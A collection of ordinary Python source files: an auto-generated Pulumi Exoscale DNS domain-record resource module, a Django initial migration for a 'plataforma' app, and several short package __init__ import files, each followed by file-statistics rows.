        """The priority of the DNS domain record (for types that support it)."""
        return pulumi.get(self, "prio")

    @prio.setter
    def prio(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "prio", value)

    @property
    @pulumi.getter
    def ttl(self) -> Optional[pulumi.Input[int]]:
        """The [Time To Live][ttl] of the domain record."""
        return pulumi.get(self, "ttl")

    @ttl.setter
    def ttl(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ttl", value)
@pulumi.input_type
class _DomainRecordState:
    def __init__(__self__, *,
                 content: Optional[pulumi.Input[str]] = None,
                 domain: Optional[pulumi.Input[str]] = None,
                 hostname: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 prio: Optional[pulumi.Input[int]] = None,
                 record_type: Optional[pulumi.Input[str]] = None,
                 ttl: Optional[pulumi.Input[int]] = None):
        """
        Input properties used for looking up and filtering DomainRecord resources.

        :param pulumi.Input[str] content: The value of the domain record.
        :param pulumi.Input[str] domain: The name of the [`Domain`][r-domain] to create the record into.
        :param pulumi.Input[str] hostname: The DNS domain record's *Fully Qualified Domain Name* (FQDN), useful for linking `A` records into `CNAME`.
        :param pulumi.Input[str] name: The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
        :param pulumi.Input[int] prio: The priority of the DNS domain record (for types that support it).
        :param pulumi.Input[str] record_type: The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
        :param pulumi.Input[int] ttl: The [Time To Live][ttl] of the domain record.
        """
        # Every state property is optional; record only the ones the caller
        # supplied so absent properties stay out of the lookup filter.
        for prop_name, prop_value in (
                ("content", content),
                ("domain", domain),
                ("hostname", hostname),
                ("name", name),
                ("prio", prio),
                ("record_type", record_type),
                ("ttl", ttl)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def content(self) -> Optional[pulumi.Input[str]]:
        """The value of the domain record."""
        return pulumi.get(self, "content")

    @content.setter
    def content(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "content", value)

    @property
    @pulumi.getter
    def domain(self) -> Optional[pulumi.Input[str]]:
        """The name of the [`Domain`][r-domain] to create the record into."""
        return pulumi.get(self, "domain")

    @domain.setter
    def domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "domain", value)

    @property
    @pulumi.getter
    def hostname(self) -> Optional[pulumi.Input[str]]:
        """
        The DNS domain record's *Fully Qualified Domain Name* (FQDN), useful
        for linking `A` records into `CNAME`.
        """
        return pulumi.get(self, "hostname")

    @hostname.setter
    def hostname(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "hostname", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the domain record; leave blank (`""`) to create a root
        record (similar to using `@` in a DNS zone file).
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def prio(self) -> Optional[pulumi.Input[int]]:
        """The priority of the DNS domain record (for types that support it)."""
        return pulumi.get(self, "prio")

    @prio.setter
    def prio(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "prio", value)

    @property
    @pulumi.getter(name="recordType")
    def record_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the domain record. Supported values are: `A`, `AAAA`,
        `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`,
        `SRV`, `SSHFP`, `TXT`, `URL`.
        """
        return pulumi.get(self, "record_type")

    @record_type.setter
    def record_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "record_type", value)

    @property
    @pulumi.getter
    def ttl(self) -> Optional[pulumi.Input[int]]:
        """The [Time To Live][ttl] of the domain record."""
        return pulumi.get(self, "ttl")

    @ttl.setter
    def ttl(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ttl", value)
class DomainRecord(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 content: Optional[pulumi.Input[str]] = None,
                 domain: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 prio: Optional[pulumi.Input[int]] = None,
                 record_type: Optional[pulumi.Input[str]] = None,
                 ttl: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        """
        Provides an Exoscale [DNS][dns-doc] domain record resource. This can be used to create, modify, and delete DNS domain records.

        ## Usage example

        ```python
        import pulumi
        import pulumi_exoscale as exoscale

        example = exoscale.Domain("example")
        myserver = exoscale.DomainRecord("myserver",
            domain=example.id,
            record_type="A",
            content="1.2.3.4")
        myserver_alias = exoscale.DomainRecord("myserverAlias",
            domain=example.id,
            record_type="CNAME",
            content=myserver.hostname)
        ```

        ## Import

        An existing DNS domain record can be imported as a resource by ID:

        ```sh
        $ pulumi import exoscale:index/domainRecord:DomainRecord www 12480484
        ```

        [dns-doc]: https://community.exoscale.com/documentation/dns/
        [r-domain]: domain.html
        [ttl]: https://en.wikipedia.org/wiki/Time_to_live

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] content: The value of the domain record.
        :param pulumi.Input[str] domain: The name of the [`Domain`][r-domain] to create the record into.
        :param pulumi.Input[str] name: The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
        :param pulumi.Input[int] prio: The priority of the DNS domain record (for types that support it).
        :param pulumi.Input[str] record_type: The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
        :param pulumi.Input[int] ttl: The [Time To Live][ttl] of the domain record.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: DomainRecordArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides an Exoscale [DNS][dns-doc] domain record resource. This can be used to create, modify, and delete DNS domain records.

        ## Usage example

        ```python
        import pulumi
        import pulumi_exoscale as exoscale

        example = exoscale.Domain("example")
        myserver = exoscale.DomainRecord("myserver",
            domain=example.id,
            record_type="A",
            content="1.2.3.4")
        myserver_alias = exoscale.DomainRecord("myserverAlias",
            domain=example.id,
            record_type="CNAME",
            content=myserver.hostname)
        ```

        ## Import

        An existing DNS domain record can be imported as a resource by ID:

        ```sh
        $ pulumi import exoscale:index/domainRecord:DomainRecord www 12480484
        ```

        [dns-doc]: https://community.exoscale.com/documentation/dns/
        [r-domain]: domain.html
        [ttl]: https://en.wikipedia.org/wiki/Time_to_live

        :param str resource_name: The name of the resource.
        :param DomainRecordArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: when the caller passed a
        # DomainRecordArgs object, expand its fields into keyword arguments;
        # otherwise forward positional/keyword arguments unchanged.
        resource_args, opts = _utilities.get_resource_args_opts(DomainRecordArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 content: Optional[pulumi.Input[str]] = None,
                 domain: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 prio: Optional[pulumi.Input[int]] = None,
                 record_type: Optional[pulumi.Input[str]] = None,
                 ttl: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads: validates
        # options, builds the property bag, and registers the resource with
        # the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id set means we are adopting an existing resource; __props__ is
        # then supplied by get() below and must not also come from the caller.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = DomainRecordArgs.__new__(DomainRecordArgs)
            # Required inputs may only be omitted when looking up by URN.
            if content is None and not opts.urn:
                raise TypeError("Missing required property 'content'")
            __props__.__dict__["content"] = content
            if domain is None and not opts.urn:
                raise TypeError("Missing required property 'domain'")
            __props__.__dict__["domain"] = domain
            __props__.__dict__["name"] = name
            __props__.__dict__["prio"] = prio
            if record_type is None and not opts.urn:
                raise TypeError("Missing required property 'record_type'")
            __props__.__dict__["record_type"] = record_type
            __props__.__dict__["ttl"] = ttl
            # hostname is an output-only property computed by the provider.
            __props__.__dict__["hostname"] = None
        super(DomainRecord, __self__).__init__(
            'exoscale:index/domainRecord:DomainRecord',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            content: Optional[pulumi.Input[str]] = None,
            domain: Optional[pulumi.Input[str]] = None,
            hostname: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            prio: Optional[pulumi.Input[int]] = None,
            record_type: Optional[pulumi.Input[str]] = None,
            ttl: Optional[pulumi.Input[int]] = None) -> 'DomainRecord':
        """
        Get an existing DomainRecord resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] content: The value of the domain record.
        :param pulumi.Input[str] domain: The name of the [`Domain`][r-domain] to create the record into.
        :param pulumi.Input[str] hostname: The DNS domain record's *Fully Qualified Domain Name* (FQDN), useful for linking `A` records into `CNAME`.
        :param pulumi.Input[str] name: The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
        :param pulumi.Input[int] prio: The priority of the DNS domain record (for types that support it).
        :param pulumi.Input[str] record_type: The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
        :param pulumi.Input[int] ttl: The [Time To Live][ttl] of the domain record.
        """
        # Setting opts.id makes _internal_init treat this as an adoption of an
        # existing resource instead of a creation.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _DomainRecordState.__new__(_DomainRecordState)
        __props__.__dict__["content"] = content
        __props__.__dict__["domain"] = domain
        __props__.__dict__["hostname"] = hostname
        __props__.__dict__["name"] = name
        __props__.__dict__["prio"] = prio
        __props__.__dict__["record_type"] = record_type
        __props__.__dict__["ttl"] = ttl
        return DomainRecord(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def content(self) -> pulumi.Output[str]:
        """
        The value of the domain record.
        """
        return pulumi.get(self, "content")
    @property
    @pulumi.getter
    def domain(self) -> pulumi.Output[str]:
        """
        The name of the [`Domain`][r-domain] to create the record into.
        """
        return pulumi.get(self, "domain")
    @property
    @pulumi.getter
    def hostname(self) -> pulumi.Output[str]:
        """
        The DNS domain record's *Fully Qualified Domain Name* (FQDN), useful for linking `A` records into `CNAME`.
        """
        return pulumi.get(self, "hostname")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def prio(self) -> pulumi.Output[int]:
        """
        The priority of the DNS domain record (for types that support it).
        """
        return pulumi.get(self, "prio")
    @property
    @pulumi.getter(name="recordType")
    def record_type(self) -> pulumi.Output[str]:
        """
        The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
        """
        return pulumi.get(self, "record_type")
    @property
    @pulumi.getter
    def ttl(self) -> pulumi.Output[int]:
        """
        The [Time To Live][ttl] of the domain record.
        """
        return pulumi.get(self, "ttl")
| 40.811966
| 211
| 0.60445
| 2,315
| 19,100
| 4.834557
| 0.086393
| 0.08649
| 0.075054
| 0.060936
| 0.839796
| 0.811294
| 0.782613
| 0.766798
| 0.750268
| 0.741333
| 0
| 0.001794
| 0.270209
| 19,100
| 467
| 212
| 40.899358
| 0.801134
| 0.381728
| 0
| 0.685259
| 1
| 0
| 0.069426
| 0.003763
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159363
| false
| 0.003984
| 0.01992
| 0
| 0.2749
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
25d083765e5ddf525d51287c630ee062f7dce71f
| 237
|
py
|
Python
|
probeye/definition/__init__.py
|
SMattfeldt/probeye
|
3a1e236f1e389f4e775a1413a4cf173f39ab2f12
|
[
"MIT"
] | null | null | null |
probeye/definition/__init__.py
|
SMattfeldt/probeye
|
3a1e236f1e389f4e775a1413a4cf173f39ab2f12
|
[
"MIT"
] | null | null | null |
probeye/definition/__init__.py
|
SMattfeldt/probeye
|
3a1e236f1e389f4e775a1413a4cf173f39ab2f12
|
[
"MIT"
] | null | null | null |
# module imports
from probeye.definition import inference_problem
from probeye.definition import forward_model
from probeye.definition import likelihood_model
from probeye.definition import parameter
from probeye.definition import prior
| 33.857143
| 48
| 0.877637
| 30
| 237
| 6.833333
| 0.433333
| 0.268293
| 0.512195
| 0.658537
| 0.312195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097046
| 237
| 6
| 49
| 39.5
| 0.957944
| 0.059072
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d300fdc8d8fd865ba7fa00aaed71333ebee485e2
| 11,028
|
py
|
Python
|
plataforma/migrations/0001_initial.py
|
bodedev/prospera
|
4ce39b0ee4ae32b3584157f23a5f94f340892980
|
[
"MIT"
] | 3
|
2017-05-11T17:48:41.000Z
|
2017-10-04T01:53:35.000Z
|
plataforma/migrations/0001_initial.py
|
bodedev/prospera
|
4ce39b0ee4ae32b3584157f23a5f94f340892980
|
[
"MIT"
] | null | null | null |
plataforma/migrations/0001_initial.py
|
bodedev/prospera
|
4ce39b0ee4ae32b3584157f23a5f94f340892980
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-18 14:02
from __future__ import unicode_literals
import autoslug.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the `plataforma` app.

    Creates the `Nodo`, `Nodos` and `Objeto` models plus one `Historical*`
    shadow table for each.
    NOTE(review): the history tables (history_id/history_date/history_type
    columns, `+`/`~`/`-` choices) match the pattern emitted by
    django-simple-history — confirm against the app's model definitions.
    Auto-generated by Django; do not hand-edit field definitions, since
    Django compares migration state byte-for-byte when autodetecting changes.
    """

    initial = True

    dependencies = [
        # Soft references to the configured user model (AUTH_USER_MODEL).
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # History shadow table for Nodo: plain IntegerField `id` (not a PK),
        # history_id is the real primary key.
        migrations.CreateModel(
            name='HistoricalNodo',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('excluido', models.BooleanField(db_index=True, default=False)),
                ('excluido_em', models.DateTimeField(blank=True, null=True)),
                ('quem_sou', models.TextField(blank=True, max_length=500, null=True, verbose_name='Quem Sou?')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('excluido_por', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('user', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
                'verbose_name': 'historical nodo',
            },
        ),
        # History shadow table for Nodos; image fields are stored as plain
        # TextField paths here (historical rows keep no file storage).
        migrations.CreateModel(
            name='HistoricalNodos',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('excluido', models.BooleanField(db_index=True, default=False)),
                ('excluido_em', models.DateTimeField(blank=True, null=True)),
                ('nome', models.CharField(max_length=50, verbose_name='Nome')),
                ('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='nome')),
                ('imagem_listagem', models.TextField(blank=True, max_length=100, null=True)),
                ('imagem_detalhes', models.TextField(blank=True, max_length=100, null=True)),
                ('titulo', models.CharField(blank=True, max_length=50, null=True, verbose_name='T\xedtulo')),
                ('descricao', models.TextField(blank=True, null=True, verbose_name='Descri\xe7\xe3o')),
                ('contato_facebook', models.URLField(blank=True, null=True, verbose_name='Facebook')),
                ('contato_whatsapp', models.URLField(blank=True, null=True, verbose_name='WhatsApp')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('excluido_por', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
                'verbose_name': 'historical nodos',
            },
        ),
        # History shadow table for Objeto (same layout as HistoricalNodos;
        # its `nodos` FK is attached by the AddField operation at the end).
        migrations.CreateModel(
            name='HistoricalObjeto',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('excluido', models.BooleanField(db_index=True, default=False)),
                ('excluido_em', models.DateTimeField(blank=True, null=True)),
                ('nome', models.CharField(blank=True, max_length=50, null=True, verbose_name='Nome')),
                ('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='nome')),
                ('imagem_listagem', models.TextField(blank=True, max_length=100, null=True)),
                ('imagem_detalhes', models.TextField(blank=True, max_length=100, null=True)),
                ('titulo', models.CharField(blank=True, max_length=50, null=True, verbose_name='T\xedtulo')),
                ('descricao', models.TextField(blank=True, null=True, verbose_name='Descri\xe7\xe3o')),
                ('contato_facebook', models.URLField(blank=True, null=True, verbose_name='Facebook')),
                ('contato_whatsapp', models.URLField(blank=True, null=True, verbose_name='WhatsApp')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('excluido_por', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
                'verbose_name': 'historical objeto',
            },
        ),
        # Live model: one Nodo profile per user (OneToOneField).
        migrations.CreateModel(
            name='Nodo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('excluido', models.BooleanField(db_index=True, default=False)),
                ('excluido_em', models.DateTimeField(blank=True, null=True)),
                ('quem_sou', models.TextField(blank=True, max_length=500, null=True, verbose_name='Quem Sou?')),
                ('excluido_por', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='nodo_excluido_por', to=settings.AUTH_USER_MODEL)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
        ),
        # Live model: Nodos, with real ImageFields (unlike its history table).
        migrations.CreateModel(
            name='Nodos',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('excluido', models.BooleanField(db_index=True, default=False)),
                ('excluido_em', models.DateTimeField(blank=True, null=True)),
                ('nome', models.CharField(max_length=50, verbose_name='Nome')),
                ('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='nome')),
                ('imagem_listagem', models.ImageField(blank=True, null=True, upload_to='imagens/nodos/listagem')),
                ('imagem_detalhes', models.ImageField(blank=True, null=True, upload_to='imagens/nodos/detalhes')),
                ('titulo', models.CharField(blank=True, max_length=50, null=True, verbose_name='T\xedtulo')),
                ('descricao', models.TextField(blank=True, null=True, verbose_name='Descri\xe7\xe3o')),
                ('contato_facebook', models.URLField(blank=True, null=True, verbose_name='Facebook')),
                ('contato_whatsapp', models.URLField(blank=True, null=True, verbose_name='WhatsApp')),
                ('excluido_por', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='nodos_excluido_por', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
        ),
        # Live model: Objeto, each belonging to a Nodos (FK with CASCADE).
        migrations.CreateModel(
            name='Objeto',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('excluido', models.BooleanField(db_index=True, default=False)),
                ('excluido_em', models.DateTimeField(blank=True, null=True)),
                ('nome', models.CharField(blank=True, max_length=50, null=True, verbose_name='Nome')),
                ('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='nome')),
                ('imagem_listagem', models.ImageField(blank=True, null=True, upload_to='imagens/objetos/listagem')),
                ('imagem_detalhes', models.ImageField(blank=True, null=True, upload_to='imagens/objetos/detalhes')),
                ('titulo', models.CharField(blank=True, max_length=50, null=True, verbose_name='T\xedtulo')),
                ('descricao', models.TextField(blank=True, null=True, verbose_name='Descri\xe7\xe3o')),
                ('contato_facebook', models.URLField(blank=True, null=True, verbose_name='Facebook')),
                ('contato_whatsapp', models.URLField(blank=True, null=True, verbose_name='WhatsApp')),
                ('excluido_por', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='objeto_excluido_por', to=settings.AUTH_USER_MODEL)),
                ('nodos', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='plataforma.Nodos')),
            ],
            options={
                'abstract': False,
            },
        ),
        # Attach the nodos FK to the history table last, after
        # 'plataforma.Nodos' exists (db_constraint=False: soft reference).
        migrations.AddField(
            model_name='historicalobjeto',
            name='nodos',
            field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='plataforma.Nodos'),
        ),
    ]
| 66.836364
| 191
| 0.614708
| 1,171
| 11,028
| 5.601196
| 0.106746
| 0.06998
| 0.04955
| 0.064796
| 0.903491
| 0.903491
| 0.903491
| 0.889312
| 0.877725
| 0.877725
| 0
| 0.007323
| 0.232318
| 11,028
| 164
| 192
| 67.243902
| 0.767423
| 0.006166
| 0
| 0.737179
| 1
| 0
| 0.148672
| 0.008396
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032051
| 0
| 0.057692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d3579f009ee43f63572c2eae938cfe10df670196
| 304
|
py
|
Python
|
telegrambot/handlers/__init__.py
|
matteing/django-telegram-bot
|
917b62846d5c8f26808b1cbb9141b0862303893a
|
[
"BSD-3-Clause"
] | 156
|
2016-01-25T13:46:58.000Z
|
2021-12-17T06:34:14.000Z
|
telegrambot/handlers/__init__.py
|
matteing/django-telegram-bot
|
917b62846d5c8f26808b1cbb9141b0862303893a
|
[
"BSD-3-Clause"
] | 36
|
2016-02-08T09:25:42.000Z
|
2021-03-19T22:04:25.000Z
|
telegrambot/handlers/__init__.py
|
matteing/django-telegram-bot
|
917b62846d5c8f26808b1cbb9141b0862303893a
|
[
"BSD-3-Clause"
] | 70
|
2016-02-07T12:17:23.000Z
|
2022-03-26T08:56:08.000Z
|
from telegrambot.handlers.conf import command # noqa
from telegrambot.handlers.conf import message # noqa
from telegrambot.handlers.conf import regex # noqa
from telegrambot.handlers.conf import unknown_command # noqa
from telegrambot.handlers.resolver import HandlerResolver, HandlerNotFound # noqa
| 60.8
| 82
| 0.832237
| 37
| 304
| 6.810811
| 0.351351
| 0.297619
| 0.456349
| 0.428571
| 0.734127
| 0.440476
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115132
| 304
| 5
| 82
| 60.8
| 0.936803
| 0.078947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d3816a14e6aa8ca6b8b45bbd0cb2326c018d2317
| 47
|
py
|
Python
|
wa_cli/commands/helpers/__init__.py
|
xverges/wa-cli
|
4ad028f9bfd0d7656142bedffc110cccb40399d2
|
[
"Apache-2.0"
] | null | null | null |
wa_cli/commands/helpers/__init__.py
|
xverges/wa-cli
|
4ad028f9bfd0d7656142bedffc110cccb40399d2
|
[
"Apache-2.0"
] | 10
|
2020-03-30T08:09:27.000Z
|
2021-02-03T19:51:16.000Z
|
wa_cli/commands/helpers/__init__.py
|
xverges/wa-cli
|
4ad028f9bfd0d7656142bedffc110cccb40399d2
|
[
"Apache-2.0"
] | 4
|
2020-05-07T15:08:45.000Z
|
2021-01-29T16:32:54.000Z
|
from .protect_readonly import protect_readonly
| 23.5
| 46
| 0.893617
| 6
| 47
| 6.666667
| 0.666667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6cc5cdd6bd391b71f8dddfdbed059d8c7339c9ca
| 159
|
py
|
Python
|
speech2speech/data_preprocessing/__init__.py
|
bithikajain/speech2speech
|
3357a25da837d8d34b3f97c7a9dddae7d27862e0
|
[
"MIT"
] | 1
|
2020-10-24T13:07:37.000Z
|
2020-10-24T13:07:37.000Z
|
speech2speech/data_preprocessing/__init__.py
|
bithikajain/speech2speech
|
3357a25da837d8d34b3f97c7a9dddae7d27862e0
|
[
"MIT"
] | 1
|
2020-10-24T17:12:24.000Z
|
2020-10-24T17:12:24.000Z
|
speech2speech/data_preprocessing/__init__.py
|
bithikajain/speech2speech
|
3357a25da837d8d34b3f97c7a9dddae7d27862e0
|
[
"MIT"
] | 1
|
2021-02-15T04:50:32.000Z
|
2021-02-15T04:50:32.000Z
|
#
# Copyright (C) 2020 Bithika Jain
#
from speech2speech.data_preprocessing.load_data import *
from speech2speech.data_preprocessing.make_spectrograms import *
| 31.8
| 64
| 0.836478
| 19
| 159
| 6.789474
| 0.684211
